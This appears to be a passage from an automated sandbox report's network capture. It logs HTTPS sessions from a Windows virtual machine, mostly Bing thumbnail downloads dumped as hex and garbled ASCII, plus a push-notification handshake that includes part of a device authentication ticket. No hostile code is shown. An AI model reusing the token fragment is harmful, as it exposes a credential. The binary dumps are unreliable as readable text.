2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 9f 28 c8 2c 64 b7 d3 e3 44 9b ff 00 db ab be 57 da 34 ff 00 21 26 f3 24 f3 3f 77 e5 7d ff 00 f6 a9 27 8b 6f 99 6b 24 3e 5f ef 3c bf de ff 00 cb 34 ab b7 7e 45 bc d1 bc 13 7d a2 0f f5 71 f9 51 6c f3 12 a5 88 a1 a3 2d a4 50 c4 e9 fb c8 3e 79 3c c9 7f f1 d5 ab ba 35 cc 76 50 f9 de 4f 97 e5 c6 fe 64 7f c1 1e ef ef 56 1c 17 d2 45 0c 9e 7f 93 e5 f9 9e 5c 71 ff 00 cf 3a 9a 3b eb 7b 88 64 b5 4f 26 49 3f d6 7f b1 f2 d2 1c 65 a0 96 b2 c7 17 88 64 f2 21 f2 e0 8f fd 5c 52 ff 00 e8 4f 57 74 98 a7 d5 6e a3 44 9b f7 7f f2 d3 fb f2 56 0e ef ed 0f b7 6a 9e 77 ee 23 ff 00 96 7f fc 4d 64 69 be 25 bf b2 d4 2e 7f b3 a6 ff 00 8f d8 fe cf 27 9b fd c6 a6 d7 35 d2 21 49 45 ea 68 dd 2e ad 16 a1 f6 d9 e6 87 cc f3 3f 77 17 9b 56 e0 96 74 bb b9 ba 8e 1f 2e 49 3f e5 a5 33 5c 9e 4b 88 Data Ascii: (,dDW4!&$?w}'ok$>_<4~E}qQl-P>y<5vPOdVE\q:;{dO&I?ed!\ROWtnDVjw#Mdi%.'5!IEh.?wVt.I?3\K
2024-12-16 10:25:11 UTC	16069	IN	Data Raw: 54 b6 32 bc 5d 73 f6 7d 3f cb af 25 f1 04 fe 6c df f5 d2 bb af 1f de 7f 05 79 cd f3 6f 9a 47 ad 22 ec 44 89 74 3b 6f b4 5d ec ff 00 9e 95 ee df 0c f4 c8 ed ec fc f7 af 2e f8 73 a6 79 b7 7f bc af 6c fd de 99 e1 dd 9f f4 ce a6 5a b1 3f 84 e5 3e 25 6a bb 61 93 fe 79 c7 5f 38 f8 d3 50 7b bd 42 57 af 50 f8 c7 ab ec b3 95 13 fe 5a 57 88 ea b3 fe fb 7d 74 53 d8 ce a6 9a 15 66 92 b1 b5 46 ab f7 52 6c 86 b2 27 f9 e6 ad 0e 69 1b df 0e 6c 7c dd 42 3a f4 9d 61 f6 43 e4 57 2f f0 ca 0d bf 3d 74 37 5f be bb a8 93 d4 da 9a b2 24 b1 b6 8d 3e 7a c4 d4 a2 f3 75 cd 95 d1 da fc 96 95 42 0b 3f f8 9b 47 be a0 d1 a3 b9 f8 57 63 5e 93 ae 4b f6 7d 27 65 73 3f 0e 6c e3 8a 1a bf e3 cb cd 90 ec a4 9d cd ad 64 73 b3 cf be ee a7 b1 f9 e6 df 58 9e 7e f9 ab 62 c7 fe 3d 36 55 81 d0 f8 66 Data Ascii: T2]s}?%lyoG"Dt;o].sylZ?>%jay_8P{BWPZW}tSfFRl'il\|B:aCW/=t7_$>zuB?GWc^K}'es?ldsX~b=6Uf
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 3c df bb 86 df 67 da 7f 7b b3 e5 ad cd 36 c8 da 43 f6 29 34 7f df c9 73 fe b3 ee 3d 55 be d2 a7 b8 bb 8e 09 ec e6 92 78 ff 00 77 27 fc 06 87 35 70 51 69 0f ba f0 c7 da 34 fd f0 4d e5 c1 e6 7e ee 3f e3 a7 e9 7a 64 fa 7e ad 6c e9 e4 c9 1f fc f3 97 fb f5 b7 3d b7 d8 b4 9b 68 27 f3 a4 fb 47 ee fe cd 2f df f9 6a 94 70 49 14 d2 3c f0 f9 7f f2 cf cb a5 19 36 5b 8a e8 4d 3c 52 3d a7 d9 7f e5 a7 fc f5 ab 5f 61 8e 2b 4f 9f f7 90 7c 92 7e f7 fe 5a 55 5f 0c de 40 fe 62 79 3e 63 c7 52 79 b0 5c 79 8f e4 ff 00 e4 5f f3 d2 93 de c5 47 63 42 0b 98 ee 3e 7b 58 7f 79 24 9f bc a8 63 57 f3 ae 66 78 66 92 4d 3a 3f 32 3f ee 55 6d 0e 48 e5 d4 a3 7f df 49 fb d4 8f cb 8a ac f8 82 59 22 fb 4d ab cd fe b2 37 93 f7 5f f2 d1 3f 86 a1 bd 6c 56 ea e7 2d 7c df 68 9b cb f3 bf d6 49 ff 00 Data Ascii: <g{6C)4s=Uxw'5pQi4M~?zd~l=h'G/jpI<6[M<R=_a+O\|~ZU_@by>cRy\y_GcB>{Xy$cWfxfM:?2?UmHIY"M7_?lV-\|hI
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 77 71 a5 ef fc 84 63 df 6f e5 f9 3f 27 cb ff 00 b3 1a c8 f0 75 f6 a5 75 a2 49 04 13 4d be df f7 91 f9 51 7c ff 00 ef 54 56 37 9a d5 be ad f6 db a9 a6 f3 e3 93 f7 b1 c9 f7 f7 d7 1f 24 9a 77 67 5c 6a 24 d1 db f8 bb 5a bf d0 b5 6b 69 f4 8b 3d 3f 64 9e 4c 92 47 14 5b de 37 5f e0 91 6b 2f c7 70 78 5e 5b 49 3f b1 34 dd 42 ca fa 4f de 7e f7 ee 79 bf c4 b5 6b c3 7a ae 93 a8 6a 17 29 75 f6 bb 7b af 31 3c bf 2b e7 fb 47 fd 33 6f f6 6b 4b c5 5e 1e 7b 78 7e c5 6b 79 f6 df 2e 4f f8 f2 fb 8f 23 b7 ff 00 13 5c ea a7 25 44 9b b1 d0 e2 ea 26 d6 a8 f3 48 d7 ca 87 c8 ba 87 f7 9f f3 d2 a1 92 da 7f f5 ef ff 00 5c e3 f2 ab d3 3c 65 a6 69 be 1f 9a 38 6d 66 b4 d6 bf d0 92 49 24 8a 2f 93 7c 9f ed 7f 1e da e3 67 97 ec 9a 4f d8 bc 9f 32 4f b4 f9 92 5c ff 00 cf 4a e8 a7 59 49 5d 1c Data Ascii: wqco?'uuIMQ\|TV7$wg\j$Zki=?dLG[7_k/px^[I?4BO~ykzj)u{1<+G3okK^{x~ky.O#\%D&H\<ei8mfI$/\|gO2O\JYI]

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49779	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:10 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 69 42 4d 77 74 57 57 78 6b 43 52 78 39 39 34 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 66 31 33 62 32 62 38 35 32 32 62 35 34 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ciBMwtWWxkCRx994.1Context: 7ff13b2b8522b54b
2024-12-16 10:25:10 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:25:10 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 69 42 4d 77 74 57 57 78 6b 43 52 78 39 39 34 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 66 31 33 62 32 62 38 35 32 32 62 35 34 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ciBMwtWWxkCRx994.2Context: 7ff13b2b8522b54b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:25:10 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 69 42 4d 77 74 57 57 78 6b 43 52 78 39 39 34 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 66 31 33 62 32 62 38 35 32 32 62 35 34 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ciBMwtWWxkCRx994.3Context: 7ff13b2b8522b54b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:25:11 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-16 10:25:11 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 50 4a 68 54 6c 4c 68 73 70 6b 4f 41 69 7a 38 79 78 38 2b 79 68 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: PJhTlLhspkOAiz8yx8+yhA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49784	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:10 UTC	375	OUT	GET /th?id=OADD2.10239360312918_180TGJBF6DGGGWMR4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:11 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 520026 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 4CAA5A95E77A4C02AE68FDE1292367AD Ref B: EWR30EDGE1416 Ref C: 2024-12-16T10:25:11Z Date: Mon, 16 Dec 2024 10:25:10 GMT Connection: close
2024-12-16 10:25:11 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 35 37 3a 35 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:57:518C
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: a9 f8 13 e1 05 86 81 37 db be 21 4b 0c 56 32 5b 3c 96 d7 b1 4a 93 5b 7d a3 ef 79 4a bf f2 d6 55 fb bb 3e e6 ee ad f2 d7 95 47 ae 6a d2 f9 68 9f f2 ce 4f f5 9e 55 5f d6 2f 35 3b b8 7e 7b cb bb 88 ed f6 47 1f 9b f2 7f df b5 ae 7a 2f 91 7b c9 32 65 73 b9 d7 34 cf 16 6a de 07 d3 75 77 fe dc bd d0 f4 ef 3a de cb cd 8b 7a 59 c5 1f de 6f 97 e4 ff 00 be 6b bc f0 0f 8c 6d fc 1f e0 3d 6f 4b d3 ff 00 b3 e4 93 cc fb 47 fa df df 5c 6e 44 ff 00 c7 63 af 07 9b 57 f1 0d a6 87 6d a3 fd b2 ef ec 3e 67 99 1d 97 9b fb 9f 9b f8 b6 d5 59 3f b5 bc e9 52 eb ce b7 fd df 99 4b da 38 cd c9 6e cb b5 d6 a8 ea fc 47 ae 6a da ad dc 90 3d e4 b2 58 fc f7 11 c7 2c df c6 d5 cd e9 5a 55 de b1 ae 7f 62 c1 37 97 e6 7e f2 e7 cd 97 64 3b 23 fe f3 b7 dd ac 48 2e 67 8a 69 12 09 a6 ff 00 ae 95 7e Data Ascii: 7!KV2[<J[}yJU>GjhOU_/5;~{Gz/{2es4juw:zYokm=oKG\nDcWm>gY?RK8nGj=X,ZUb7~d;#H.gi~
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 58 de 9f 0a ec fb 95 05 3b cf 91 29 b8 b6 89 e6 46 94 10 47 71 50 dc 69 f2 53 6c 6f 23 ab 9f 69 ae 79 29 45 9a a6 9a b9 4d 2d a4 8a ad 5a 2c 94 ef 3f fe 7a 43 56 ac 65 83 fe b9 d4 4a 52 6b 62 e2 b5 36 bc 3f 7c e9 5d 46 9b a8 6f 87 e7 ae 46 d1 63 49 7e 4a de d1 f6 4b 5e 4e 2a 29 dd 9d 30 d8 de 82 5d f5 34 11 48 93 6f 49 aa a4 3e 5a 55 d8 6b cd 96 e5 8e 92 e6 44 fb f5 1f 9f 1b d4 fe 57 9b f7 ea 09 f4 ff 00 ee 56 4a 48 68 af 75 14 6f 59 73 db 3d 5f 9e da 78 be 7a a5 25 e6 cf bf 5d 34 ef 6f 74 65 5f 22 aa dd 5b 55 d9 2e 63 7f b9 55 6e 27 ae 8a 7c f7 02 94 90 53 7c af ef d3 a4 96 a3 9e 5a e9 5c e4 37 60 92 28 29 3c af fa 63 4b f2 7d fa b9 0c f1 d0 ef 1d 81 3b 99 72 58 c9 2d 47 f6 19 12 b5 66 9f fe d9 d4 1b b7 d5 c2 72 b5 c1 ab 94 23 b6 fe fd 4b f6 68 ea 59 db Data Ascii: X;)FGqPiSlo#iy)EM-Z,?zCVeJRkb6?\|]FoFcI~JK^N*)0]4HoI>ZUkDWVJHhuoYs=_xz%]4ote_"[U.cUn'\|S\|Z\7`()<cK};rX-Gfr#KhY
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: c7 27 99 f6 0b 6f 2f e7 79 13 fe 7a 7f ba b5 4a c6 08 22 fb 47 d8 a1 f3 27 93 64 77 32 4b 2f fe 85 fd ec d7 14 69 b4 af 2d cf 4e 75 53 97 2c 76 3b cf 0a b5 dd de a3 bd ec ed 24 92 4d f2 7d 9a 2f ee 2f de 67 a3 5f f1 0d a6 99 e3 2b d9 f4 f8 7e d1 a9 6a bb 2d 34 ef b8 96 d6 91 49 f7 9f fd b6 a6 e9 d6 9f d9 57 52 6a 12 7f ae bc b6 78 2f 7c c9 b7 f9 eb fd cf f8 0d 6a 5a e9 f6 3a 65 a4 77 57 b6 70 c9 7d 6f 1b c9 f6 9f f9 f4 4f ee aa 56 36 57 6f a3 36 8b 69 2b 3b 1e 73 e3 ed 69 f4 cb 4b 6b 2d 3e ce 29 26 8e 5f 32 e6 f6 4d ee 92 4f ff 00 02 fe ed 74 1f 0c bc fd 43 49 b9 44 86 19 20 8e 37 93 cc 8a 2d 8f 3c ad fc 7b ff 00 d8 ed 5d af 84 7e 10 ea df 12 7c 4f 6d 06 a9 17 d9 b4 af 33 ed f7 bf 66 d9 be 08 87 dd 92 6e dc d6 dd c2 f8 43 4a d2 64 d2 3c 21 f6 b9 34 af b4 Data Ascii: 'o/yzJ"G'dw2K/i-NuS,v;$M}//g_+~j-4IWRjx/\|jZ:ewWp}oOV6Wo6i+;siKk->)&_2MOtCID 7-<{]~\|Om3fnCJd<!4
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: f9 e6 ff 00 b6 95 3f da f4 d8 ae f7 a4 33 48 ff 00 f2 ce b0 bc fd d4 27 9f 2f dc f3 4d 57 28 b9 8f bd 76 d4 35 62 3a 36 d7 d3 b7 63 c1 dc 8b 6c 94 7c f5 2d 12 53 28 8a 3a 7d 3a 8a 00 8e 92 3a 96 8d b4 00 da 36 c7 4e 8d 69 db 6b 32 88 24 8a 8d db 2a 7d b4 df 2e ab 98 56 19 1b 53 f7 51 e5 d1 e5 d4 8f 99 a1 d1 b5 3f 6c 6f 51 47 4e 8d aa 5a 29 48 9b c8 a3 ec d4 47 2c 95 2c 72 54 da 68 d9 38 32 2f b1 d3 24 b6 92 ad 47 3d 3f ed 34 94 a6 82 d0 65 2f 26 4a 3c 8a bf e6 a3 d3 64 6a 39 9f 50 e5 8f 73 3f c8 a6 f9 15 7f cd 8e 99 e7 c7 55 af 61 72 c0 a7 e4 49 46 ca b5 24 91 d3 77 47 42 b8 5a 25 7d 94 da b1 26 ca 67 97 4c 45 79 6a 29 16 ad 79 1e d4 79 14 09 a6 ca 7b 68 db 56 bc 8a 3c 8a 77 17 2b 2a ed a3 6d 5a f2 28 f2 28 b9 51 8b 29 6c a3 65 5d f2 29 de 45 2e 62 b9 59 Data Ascii: ?3H'/MW(v5b:6cl\|-S(:}::6Nik2$}.VSQ?loQGNZ)HG,,rTh82/$G=?4e/&J<dj9Ps?UarIF$wGBZ%}&gLEyj)yy{hV<w+mZ((Q)le])E.bY
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: bf 46 ff 00 54 bf 7b e6 55 6f 9f fb 95 de ea 29 26 a7 a7 c9 e0 d8 2c e1 f2 ed ee 61 fb 6d cd f4 4f fe 9e eb 0f 99 f3 c7 d5 25 77 ae ee 6b 6e 44 53 49 6a 73 31 fc 44 f0 b7 8b 6c ef bc 3d 3d 9d df db a4 d4 bc cd 26 e6 2b 44 b6 4b f8 9b fe 7b ff 00 cb 34 ff 00 81 56 77 89 ae 75 6f 19 f8 66 3f 14 59 43 77 6f f6 39 26 fd e4 b0 a6 f9 25 8f 66 d8 a3 ff 00 9e b1 c6 ab fc 2b b7 d6 b3 fc 79 e0 0d 37 4c f1 be 93 a4 3f 8a be d3 3e ab fe 8f 1d b4 b6 8f e7 5a 4b f7 a3 49 93 8d 9b aa 9e b9 a1 eb 56 5e 21 d4 bc 35 75 a9 5d fd bb 4e b6 9a 39 2c a2 97 f8 d9 37 c9 fb c5 f9 37 57 35 46 d2 69 a2 a1 76 ec 72 fe 27 d5 64 d6 3c db dd 5e cf cc d7 2f 6e 7c fb 9d 4b cd f9 24 dc 9f 71 a3 fb bf ed 55 0d 36 ce ee 5d 42 c6 fb f7 32 41 1c 9f eb 25 ff 00 65 fe f6 da d1 81 ad 3f d7 dd 43 Data Ascii: FT{Uo)&,amO%wknDSIjs1Dl==&+DK{4Vwuof?YCwo9&%f+y7L?>ZKIV^!5u]N9,77W5Fivr'd<^/n\|K$qU6]B2A%e?C
2024-12-16 10:25:11 UTC	16384	IN	Data Raw: 8e d7 fe 59 ff 00 cb 4f f7 2b c8 3f 6a 4f 12 ff 00 6a f8 9a 2d 07 4e 9b fd 17 4e 8f cb ff 00 81 d7 ad df 5f 47 e1 cf 06 dc ea 8f fe be 48 fc b8 eb e6 1d 4a e6 3b bd 5a 4b d7 ff 00 5f 25 cd 47 31 ac b4 56 35 2e a0 df a4 d8 e9 ff 00 f6 d2 5a ec bc 1d e1 cf b5 f8 7e fa ea 7f dd c1 6f 1f fa cf fd 97 fe fa ae 46 09 7f d2 e3 7f f5 92 47 5e a9 6b 7d 1d 97 c1 7b 97 ff 00 57 24 92 25 49 29 5c f3 4f 05 c5 24 5e 26 df fc 11 c9 5d 3f 8e 2f bc df 10 c7 02 43 e5 f9 96 de 5d 62 78 66 c6 04 b4 fe d1 9e 6f df c9 fb c8 e3 a9 f5 8b 69 ee f5 68 ee 9e 6f de 79 74 9d 89 28 dd 79 96 f6 92 59 79 d0 fe f2 5f 2f fe fa aa 76 3a 7d fd ef fc 4b ac a1 f3 24 f9 eb 6a d6 c6 d3 c9 f9 3f 79 e5 fe f3 fe 07 4b a9 5f 47 a5 78 7a e5 d3 fd 7c 91 f9 71 53 13 38 ad 72 78 13 49 8e ca 0f 27 cc 8f Data Ascii: YO+?jOj-NN_GHJ;ZK_%G1V5.Z~oFG^k}{W$%I)\O$^&]?/C]bxfoihoyt(yYy_/v:}K$j?yK_Gxz\|qS8rxI'
2024-12-16 10:25:12 UTC	16067	IN	Data Raw: d2 bf b4 ee ef 9f 4e bc f2 ff 00 b3 a4 7f f5 b1 7f df 11 c3 fe cb 7a 55 a8 3c 23 1e 85 a1 dc ea 9a 87 9d 79 3c 97 29 3d cc 7e 52 3b ff 00 bb fe f6 ea f2 a5 8c 8d da 97 5d 0e f8 e1 64 d2 71 e9 d4 c1 be 68 df c3 11 dd 7f 69 4d 7b 75 1d ef f6 65 b7 97 bf ce fb ff 00 dd fe 2a 95 2c e4 b2 d2 64 fb 55 9f d8 fc bb d7 fb 35 b4 b2 ef 9b e5 ff 00 96 d2 2f f0 fc df df ae 7b c3 fe 25 9d 3c 4d be da cf ec 50 47 a8 fd a2 4b 68 be 47 de af f7 a2 fe e3 ad 74 7a e4 1f db 1a dd ce b7 a7 79 3f 61 93 7c 9e 67 9a ef e7 ff 00 96 eb 4a 51 94 5d 9e 97 1c 65 19 2b ad 6d a1 4b 4d 58 e5 d5 b6 41 f6 48 fc b8 df ed 32 45 2f fa bf f8 17 f7 ab ba d1 f4 eb 4b bf b3 69 1a 5d e6 a3 71 1c 92 7e f7 ed 37 68 90 fc bf c5 5c ae 9b e4 59 5a c8 9f e8 97 11 c9 fe b2 48 a2 ff 00 c7 b6 56 b5 af 88 Data Ascii: NzU<#y<)=~R;]dqhiM{ue*,dU5/{%<MPGKhGtzy?a\|gJQ]e+mKMXAH2E/Ki]q~7h\YZHV
2024-12-16 10:25:12 UTC	16384	IN	Data Raw: 3c ef dd d5 b8 f5 08 de 9c 71 04 cb 0e 4b ff 00 5d 29 d4 d8 e7 8d a8 dd 1f fd 73 ad e3 5d 33 27 45 8e db 46 da 3f 77 fc 14 ff 00 2b 7d 3f 6b 07 d4 8f 67 3e c3 24 8a a2 f2 aa d4 91 48 94 cd b2 55 7b 58 77 0e 56 55 db 45 58 92 a2 93 cb 4a af 68 83 95 86 ca 36 51 ba 3a 37 47 54 a4 89 e5 61 b2 9b e5 52 d1 4f 99 00 dd b4 dd b2 54 94 da 60 36 9b 52 6d a6 c8 b4 0d 2b 8d a7 46 d5 1d 47 fb ca 5c c8 a4 ac 5a dd 4b e6 d5 7d f4 df 36 95 e2 cb b3 2c ee a3 75 55 f3 76 53 e3 96 37 e2 a7 dc 29 29 22 d4 72 d1 24 b1 d4 50 ae fa 96 3b 64 ac 65 c8 99 ac 79 ec 41 3c b1 bc 35 41 fc cf 3a b6 7e c7 1d 49 f6 04 ac 4d b9 92 39 79 fe 4a 8e 3f f6 2b ad 93 4c 82 a2 93 4c 82 8b b3 4e 65 d4 e5 a3 f3 d3 ee 55 b8 da 77 ad bf b3 46 94 cf 22 3a af 69 35 d4 9b d3 7d 0c 7d b3 fa 54 91 db 48 Data Ascii: <qK])s]3'EF?w+}?kg>$HU{XwVUEXJh6Q:7GTaROT`6Rm+FG\ZK}6,uUvS7))"r$P;deyA<5A:~IM9yJ?+LLNeUwF":i5}}TH
2024-12-16 10:25:12 UTC	16384	IN	Data Raw: 3d f4 45 28 27 82 d2 69 11 e6 f3 3f eb 9d 47 3b 49 2c 3b de 1a d6 b5 b6 d2 5e 5f 2e ca 1f 9e 2f fb ee 4a a5 fb b7 f3 11 3c 9f f9 e9 e6 56 9c c4 b5 72 38 db 7c 34 27 ee be e4 34 cb a5 9e 5f 9f fd 5f 97 4d 92 09 12 1d ef 35 51 03 a4 f2 e1 9b 62 7f db 4a 64 10 49 f6 bd 89 4b 1c 51 f9 3b e9 20 97 65 50 16 24 97 ca f2 e7 82 6f 2e 48 ea d6 9d 2c 77 7f bf d4 3f 79 fb bf f5 51 7c 9f f0 2a ab a1 dc fd 9e ee 47 fd cf 97 26 f8 ff 00 7b 16 f4 f9 ab bc f8 73 a5 78 33 fe 11 d8 e7 f1 46 b1 69 6f 04 9e 77 fc bd fc fb 95 3f 76 9b 63 f9 fe 6f 7f 96 b1 a9 25 14 5c 22 db b1 cf e9 b6 da 6f f6 7c 7f 6e 9a 6f 22 e2 47 93 f7 7f b9 f9 97 fd f5 da fb ff 00 f1 da d8 f0 e2 ce fa 85 8e 91 6b f6 49 20 b8 91 3c cb 9f 29 3f 71 2f f1 f9 8c de 95 89 37 89 e4 9b c1 16 3e 1a ba 87 fd 16 ce Data Ascii: =E('i?G;I,;^_./J<Vr8\|4'4__M5QbJdIKQ; eP$o.H,w?yQ\|*G&{sx3Fiow?vco%\"o\|no"GkI <)?q/7>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49785	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:25:10 UTC	375	OUT	GET /th?id=OADD2.10239357448969_167ANDP278VEQSWN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-16 10:25:11 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 513505 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: D186B697B51547C0A72A4A348F65646C Ref B: EWR30EDGE1610 Ref C: 2024-12-16T10:25:11Z Date: Mon, 16 